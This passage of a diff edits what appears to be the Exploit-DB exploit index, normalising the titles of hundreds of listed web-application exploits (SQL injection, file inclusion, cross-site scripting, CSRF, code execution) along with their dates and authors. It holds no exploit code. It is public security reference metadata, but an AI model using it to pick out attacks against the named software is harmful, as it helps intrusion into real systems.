Injection",2008-07-11,"Hussin X",php,webapps,0 @@ -19945,7 +19956,7 @@ id,file,description,date,author,platform,type,port 6487,platforms/php/webapps/6487.txt,"CYASK 3.x - 'neturl' Parameter Local File Disclosure",2008-09-18,xy7,php,webapps,0 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site - 'picture_category.php' SQL Injection",2008-09-18,SarBoT511,php,webapps,0 6489,platforms/php/webapps/6489.txt,"ProActive CMS - 'template' Parameter Local File Inclusion",2008-09-18,r45c4l,php,webapps,0 -6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0 +6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation",2008-09-18,"Neo Anderson",php,webapps,0 6492,platforms/php/webapps/6492.php,"Pluck CMS 4.5.3 - 'update.php' Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 - 'detail.php' SQL Injection",2008-09-19,"Egypt Coder",php,webapps,0 6495,platforms/php/webapps/6495.txt,"Explay CMS 2.1 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2008-09-19,hodik,php,webapps,0 @@ -20204,7 +20215,7 @@ id,file,description,date,author,platform,type,port 6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 -6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0 +6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injections",2008-10-25,G4N0K,php,webapps,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0 6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps,0 @@ -21708,7 +21719,7 @@ id,file,description,date,author,platform,type,port 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9040,platforms/php/webapps/9040.txt,"Joomla! Component com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 -9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0 +9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injections",2009-06-29,jmp-esp,php,webapps,0 9043,platforms/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 9044,platforms/php/webapps/9044.txt,"dm FileManager 3.9.4 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 9048,platforms/php/webapps/9048.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 @@ -22028,7 +22039,7 @@ id,file,description,date,author,platform,type,port 9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing - (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 9636,platforms/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 -9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection",2009-09-10,"Salvatore Fresta",php,webapps,0 +9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injections",2009-09-10,"Salvatore Fresta",php,webapps,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - 'index.php show' SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 9640,platforms/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,php,webapps,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 @@ -22667,7 +22678,7 @@ id,file,description,date,author,platform,type,port 10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop - (productdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 10977,platforms/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,php,webapps,0 10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection",2010-01-03,Sora,php,webapps,0 -10979,platforms/php/webapps/10979.txt,"Joomla! Component com_oziogallery2 - / IMAGIN Arbitrary file write",2010-01-03,"Ubik and er",php,webapps,0 +10979,platforms/php/webapps/10979.txt,"Joomla! Component com_oziogallery2 / IMAGIN - Arbitrary File Write",2010-01-03,"Ubik and er",php,webapps,0 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News - 'newsdetail.php' SQL Injection (2)",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 / 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 10984,platforms/php/webapps/10984.txt,"Joomla! Component com_cartikads 1.0 - Arbitrary File Upload",2010-01-04,kaMtiEz,php,webapps,0 @@ -22830,7 +22841,7 @@ id,file,description,date,author,platform,type,port 11329,platforms/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,php,webapps,0 11330,platforms/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - 'Login.DO' SQL Injection",2010-02-04,"Asheesh Anaconda",windows,webapps,0 11334,platforms/php/webapps/11334.txt,"Audistats 1.3 - SQL Injection",2010-02-05,kaMtiEz,php,webapps,0 -11336,platforms/php/webapps/11336.txt,"Open Bulletin Board - Multiple Blind SQL Injection",2010-02-06,AtT4CKxT3rR0r1ST,php,webapps,0 +11336,platforms/php/webapps/11336.txt,"Open Bulletin Board - Multiple Blind SQL Injections",2010-02-06,AtT4CKxT3rR0r1ST,php,webapps,0 11337,platforms/php/webapps/11337.txt,"Joomla! Component com_photoblog - Blind SQL Injection",2010-02-06,ALTBTA,php,webapps,0 11339,platforms/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS - SQL Injection",2010-02-06,Tr0y-x,php,webapps,0 11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0 @@ -23452,7 +23463,7 @@ id,file,description,date,author,platform,type,port 12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12340,platforms/php/webapps/12340.txt,"Joomla! Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0 12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 -12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injection",2010-04-22,v3n0m,php,webapps,0 +12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injections",2010-04-22,v3n0m,php,webapps,0 12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps,0 12350,platforms/php/webapps/12350.txt,"In-portal 5.0.3 - Arbitrary File Upload",2010-04-23,eidelweiss,php,webapps,0 12351,platforms/php/webapps/12351.txt,"memorial Web site script - 'id' SQL Injection",2010-04-23,v3n0m,php,webapps,0 @@ -24128,7 +24139,7 @@ id,file,description,date,author,platform,type,port 14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps,0 14263,platforms/php/webapps/14263.txt,"Joomla! Component ArtForms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla! Component 'PaymentsPlus' 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 -14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injection",2010-07-08,Callo,php,webapps,0 +14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injections",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"Pithcms - (theme) Local/Remote File Inclusion",2010-07-08,eidelweiss,php,webapps,0 14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate - Arbitrary File Upload",2010-07-08,SONIC,php,webapps,0 @@ -24239,7 +24250,7 @@ id,file,description,date,author,platform,type,port 14469,platforms/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps,0 14470,platforms/php/webapps/14470.txt,"Ballettin Forum - SQL Injection",2010-07-25,3v0,php,webapps,0 14471,platforms/php/webapps/14471.txt,"CMS Ignition - SQL Injection",2010-07-25,neavorc,php,webapps,0 -14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection",2010-07-25,"Salvatore Fresta",php,webapps,0 +14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injections",2010-07-25,"Salvatore Fresta",php,webapps,0 14483,platforms/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,php,webapps,0 14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps,0 14476,platforms/php/webapps/14476.txt,"Joomla! Component Visites 1.1 RC2 - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0 @@ -24247,7 +24258,7 @@ id,file,description,date,author,platform,type,port 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 14488,platforms/php/webapps/14488.txt,"Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,php,webapps,0 -14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 +14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection / Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 14495,platforms/php/webapps/14495.txt,"Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0 14499,platforms/php/webapps/14499.txt,"Joomla! Component 'com_pbbooking' 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 @@ -24275,7 +24286,7 @@ id,file,description,date,author,platform,type,port 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0 -14598,platforms/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0 +14598,platforms/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps,0 14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,php,webapps,0 14592,platforms/php/webapps/14592.txt,"Joomla! Component 'com_yellowpages' - SQL Injection",2010-08-09,"al bayraqim",php,webapps,0 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,php,webapps,0 @@ -24313,7 +24324,7 @@ id,file,description,date,author,platform,type,port 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection",2010-08-22,L1nK,asp,webapps,0 14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion",2010-08-23,LoSt.HaCkEr,php,webapps,0 14714,platforms/php/webapps/14714.txt,"Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 -14716,platforms/php/webapps/14716.txt,"AneCMS - /registre/next SQL Injection",2010-08-23,Sweet,php,webapps,0 +14716,platforms/php/webapps/14716.txt,"AneCMS - '/registre/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 14717,platforms/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0 14718,platforms/php/webapps/14718.txt,"Joomla! Component 'com_zoomportfolio' - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0 14722,platforms/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0 @@ -24346,7 +24357,7 @@ id,file,description,date,author,platform,type,port 14839,platforms/php/webapps/14839.txt,"GuestBookPlus - HTML Injection / Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0 14845,platforms/php/webapps/14845.txt,"Joomla! Component PicSell 1.0 - Local File Disclosure",2010-08-30,Craw,php,webapps,0 -14846,platforms/php/webapps/14846.txt,"Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0 +14846,platforms/php/webapps/14846.txt,"Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injections",2010-08-31,"Chip d3 bi0s",php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - 'viewpost.php' SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0 @@ -24365,7 +24376,7 @@ id,file,description,date,author,platform,type,port 14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,AmnPardaz,php,webapps,0 14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps,0 14901,platforms/php/webapps/14901.txt,"Joomla! Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0 -14902,platforms/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0 +14902,platforms/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections",2010-09-05,Solidmedia,php,webapps,0 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 @@ -24379,7 +24390,7 @@ id,file,description,date,author,platform,type,port 14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,php,webapps,0 14927,platforms/php/webapps/14927.txt,"dynpage 1.0 - Multiple Vulnerabilities",2010-09-07,Abysssec,php,webapps,0 14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 - SQL Injection",2010-09-07,mr_me,windows,webapps,0 -14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 - Multiple Blind SQL Injection",2010-09-07,mr_me,windows,webapps,0 +14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 - Multiple Blind SQL Injections",2010-09-07,mr_me,windows,webapps,0 14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection",2010-09-07,mr_me,windows,webapps,0 14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection",2010-09-07,"Stephan Sattler",php,webapps,0 14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 @@ -24431,7 +24442,7 @@ id,file,description,date,author,platform,type,port 15078,platforms/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps,0 15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass",2010-09-22,K-159,php,webapps,0 -15084,platforms/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0 +15084,platforms/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injections",2010-09-22,"Salvatore Fresta",php,webapps,0 15085,platforms/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,php,webapps,0 15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps,0 15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection",2010-09-23,Gamoscu,php,webapps,0 @@ -24695,7 +24706,7 @@ id,file,description,date,author,platform,type,port 15656,platforms/php/webapps/15656.txt,"LittlePhpGallery 1.0.2 - Local File Inclusion",2010-12-01,"kire bozorge khavarmian",php,webapps,0 15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 - Cross-Site Scripting",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 -15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 +15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections",2010-12-02,underground-stockholm.com,asp,webapps,0 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0 15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Routers (Multiple Models) - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0 15673,platforms/asp/webapps/15673.txt,"Dejcom Market CMS - 'showbrand.aspx' SQL Injection",2010-12-04,Mormoroth,asp,webapps,0 @@ -24749,7 +24760,7 @@ id,file,description,date,author,platform,type,port 15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15771,platforms/php/webapps/15771.txt,"SchuldnerBeratung - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15772,platforms/php/webapps/15772.txt,"PayPal Shop Digital - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 -15773,platforms/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 +15773,platforms/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",php,webapps,0 15775,platforms/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 - Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0 @@ -24924,7 +24935,7 @@ id,file,description,date,author,platform,type,port 16157,platforms/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution",2011-02-11,mr_me,jsp,webapps,0 16158,platforms/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 16159,platforms/php/webapps/16159.txt,"Escort Agency CMS - Blind SQL Injection",2011-02-12,NoNameMT,php,webapps,0 -16160,platforms/php/webapps/16160.txt,"PixelPost 1.7.3 - Multiple POST Variables SQL Injection",2011-02-12,LiquidWorm,php,webapps,0 +16160,platforms/php/webapps/16160.txt,"PixelPost 1.7.3 - Multiple POST Parameter SQL Injections",2011-02-12,LiquidWorm,php,webapps,0 16170,platforms/php/webapps/16170.txt,"phpMyBitTorrent 2.0.4 - SQL Injection",2011-02-15,#forkbombers,php,webapps,0 16171,platforms/cfm/webapps/16171.py,"Lingxia I.C.E CMS - Blind SQL Injection",2011-02-15,mr_me,cfm,webapps,0 16172,platforms/php/webapps/16172.txt,"omegabill 1.0 build 6 - Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps,0 @@ -25235,7 +25246,7 @@ id,file,description,date,author,platform,type,port 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0 17442,platforms/jsp/webapps/17442.txt,"ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 -17444,platforms/php/webapps/17444.txt,"Webcat - Multiple Blind SQL Injection",2011-06-23,w0rd,php,webapps,0 +17444,platforms/php/webapps/17444.txt,"Webcat - Multiple Blind SQL Injections",2011-06-23,w0rd,php,webapps,0 17445,platforms/php/webapps/17445.txt,"2Point Solutions - 'cmspages.php' SQL Injection",2011-06-23,"Newbie Campuz",php,webapps,0 17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion",2011-06-23,bd0rk,php,webapps,0 17452,platforms/php/webapps/17452.txt,"Joomla! Component 'JoomlaXi' - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0 @@ -25270,11 +25281,11 @@ id,file,description,date,author,platform,type,port 17523,platforms/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 17525,platforms/php/webapps/17525.txt,"Joomla! Component 'com_xmap' 1.2.11 - Blind SQL Injection",2011-07-12,jdc,php,webapps,0 -17528,platforms/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injection",2011-07-13,"Robert Cooper",php,webapps,0 +17528,platforms/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",php,webapps,0 17529,platforms/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injections",2011-07-13,LiquidWorm,php,webapps,0 17530,platforms/php/webapps/17530.txt,"Joomla! Component 'com_sobi2' 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,php,webapps,0 17531,platforms/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 -17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection",2011-07-14,LiquidWorm,php,webapps,0 +17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injections",2011-07-14,LiquidWorm,php,webapps,0 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,php,webapps,0 17553,platforms/php/webapps/17553.txt,"Joomla! Component 'com_rsappt_pro2' - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0 @@ -25548,7 +25559,7 @@ id,file,description,date,author,platform,type,port 18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 - 'do.php' CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0 18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' Parameter Local file Inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 -18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 +18101,platforms/hardware/webapps/18101.pl,"COMTREND CT-5624 Router - Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0 18110,platforms/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0 18111,platforms/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - 'ajax_save_name.php' Remote Code Execution",2011-11-13,EgiX,php,webapps,0 @@ -25711,7 +25722,7 @@ id,file,description,date,author,platform,type,port 18498,platforms/php/webapps/18498.html,"SyndeoCMS 3.0 - Cross-Site Request Forgery",2012-02-19,"Ivano Binetti",php,webapps,0 18502,platforms/php/webapps/18502.html,"Plume CMS 1.2.4 - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",php,webapps,0 18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",hardware,webapps,0 -18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 (ADSL Router) - Cross-Site Request Forgery",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 +18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 ADSL Router - Cross-Site Request Forgery",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 18561,platforms/php/webapps/18561.txt,"lizard cart - 'search.php' SQL Injection",2012-03-05,"Number 7",php,webapps,0 18563,platforms/php/webapps/18563.txt,"Fork CMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 18506,platforms/php/webapps/18506.txt,"Brim < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 @@ -25736,7 +25747,7 @@ id,file,description,date,author,platform,type,port 18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 Beta 5 - search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 18564,platforms/php/webapps/18564.txt,"Drupal 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 -18553,platforms/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injection",2012-03-03,"Ali Raheem",multiple,webapps,0 +18553,platforms/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",multiple,webapps,0 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQL Injections",2012-03-03,G13,php,webapps,0 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x < 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 18558,platforms/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection",2012-03-04,"Easy Laster",php,webapps,0 @@ -25787,7 +25798,7 @@ id,file,description,date,author,platform,type,port 18667,platforms/php/webapps/18667.html,"Family CMS 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 18668,platforms/php/webapps/18668.txt,"vBshop - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-03-26,ToiL,php,webapps,0 18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple 